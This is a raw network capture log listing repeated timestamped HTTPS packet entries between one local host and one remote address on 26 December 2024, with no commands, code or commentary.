                                                                                                                                                                              Dec 26, 2024 18:26:52.168323994 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.174731016 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.174745083 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.174808979 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.174813986 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.174860954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.181832075 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.181847095 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.181910992 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.181915998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.181962013 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.188247919 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.188262939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.188325882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.188330889 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.188384056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.351624966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.351644039 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.351732016 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.351737022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.351788044 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.357553959 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.357567072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.357634068 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.357639074 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.357702017 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.364815950 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.364830017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.364891052 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.364896059 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.364943981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.371882915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.371896982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.371958017 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.371962070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.372009993 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.379003048 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.379017115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.379076004 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.379080057 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.379126072 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.385710955 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.385725021 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.385787010 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.385792017 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.385845900 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.392050982 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.392066002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.392128944 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.392133951 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.392185926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.399267912 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.399281025 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.399343967 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.399348021 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.399398088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.561530113 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.561547041 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.561630964 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.561639071 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.561680079 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.568564892 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.568581104 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.568662882 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.568666935 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.568715096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.575913906 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.575928926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.576004028 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.576009035 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.576056004 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.582056046 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.582071066 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.582139015 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.582144022 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.582201004 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.589396000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.589411020 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.589478970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.589483976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.589531898 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.595910072 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.595923901 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.595993996 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.595998049 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.596041918 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.602998972 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.603018999 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.603084087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.603087902 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.603138924 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.613212109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.613225937 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.613298893 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.613303900 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.613358974 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.772182941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.772198915 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.772291899 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.772298098 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.772341013 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.779160976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.779181004 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.779251099 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.779256105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.779306889 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.786381960 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.786396027 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.786473036 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.786482096 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.786530018 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.792630911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.792644978 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.792732954 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.792742014 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.792792082 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.799895048 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.799909115 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.799983025 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.799993992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.800035000 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.806528091 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.806543112 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.806608915 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.806615114 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.806657076 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.813611984 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.813628912 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.813688993 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.813694000 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.813735962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.813769102 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.824131966 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.824146032 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.824222088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.824228048 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.824280024 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.983122110 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.983139992 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.983287096 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.983297110 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.983364105 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.990211964 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.990257978 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.990312099 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.990318060 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.990365982 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.990381002 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.996601105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.996615887 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.996710062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:52.996715069 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:52.996767998 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.003689051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.003703117 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.003783941 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.003788948 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.003842115 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.010654926 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.010669947 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.010746956 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.010752916 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.010807037 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.017371893 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.017386913 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.017466068 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.017472029 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.017527103 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.024548054 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.024569988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.024648905 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.024652958 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.024709940 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.034631968 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.034647942 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.034728050 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.034734011 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.034775972 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.193169117 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.193186998 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.193291903 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.193299055 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.193350077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.200373888 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.200388908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.200453043 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.200459003 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.200506926 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.207479954 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.207493067 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.207555056 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.207559109 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.207606077 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.214638948 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.214653969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.214730024 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.214735031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.214782000 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.220953941 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.220968962 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.221049070 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.221054077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.221097946 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.227561951 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.227582932 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.227653027 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.227658033 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.227713108 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.234740019 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.234756947 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.234828949 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.234834909 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.234879971 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.245369911 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.245387077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.245460033 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.245465994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.245512962 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.404016972 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.404033899 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.404154062 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.404160976 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.404230118 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.411097050 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.411112070 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.411185980 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.411190033 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.411236048 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.417357922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.417371988 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.417438984 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.417448044 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.417499065 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.424566031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.424581051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.424645901 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.424650908 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.424712896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.431731939 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.431745052 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.431807041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.431813002 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.431840897 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.431859970 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.438491106 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.438508034 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.438572884 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.438579082 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.438631058 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.445527077 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.445542097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.445616007 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.445622921 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.445677042 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.455785036 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.455800056 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.455873013 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.455877066 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.455919981 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.615128994 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.615145922 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.615283966 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.615293980 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.615338087 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.621371031 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.621386051 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.621476889 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.621481895 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.621537924 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.628453970 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.628470898 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.628557920 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.628562927 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.628619909 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.635646105 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.635662079 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.635739088 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.635745049 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.635786057 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.641910076 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.641925097 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.641995907 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.642000914 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.642057896 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.649589062 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.649605989 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.649692059 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.649698019 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.649749041 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.657222033 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.657237053 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.657309055 CET49719443192.168.2.16172.67.214.186
                                                                                                                                                                              Dec 26, 2024 18:26:53.657315969 CET44349719172.67.214.186192.168.2.16
                                                                                                                                                                              Dec 26, 2024 18:26:53.657362938 CET49719443192.168.2.16172.67.214.186
